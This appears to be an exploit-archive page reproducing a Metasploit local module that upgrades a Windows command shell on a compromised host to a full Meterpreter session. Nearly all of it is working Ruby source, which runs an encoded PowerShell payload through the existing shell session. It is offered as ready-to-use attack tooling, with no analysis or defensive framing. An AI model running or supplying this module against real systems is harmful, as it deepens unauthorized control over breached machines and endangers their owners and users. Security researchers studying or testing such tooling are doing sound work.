Windows Command Shell Upgrade (Powershell)



EKU-ID: 3809 CVE: OSVDB-ID:
Author: Ben Campbell Published: 2014-02-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Command Shell Upgrade (Powershell)',
        'Description'   => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
          ],
        'DefaultOptions' =>
            {
                'WfsDelay'     => 10,
            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'shell' ],
        'Targets' => [ [ 'Universal', {} ] ],
        'DefaultTarget' => 0
      ))
  end

  def exploit
    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"

    if file? "%WINDIR%\\System32#{psh_path}"
      print_status("Executing powershell command line...")
      cmd_exec(cmd_psh_payload(payload.encoded))
    else
      fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
    end
  end

end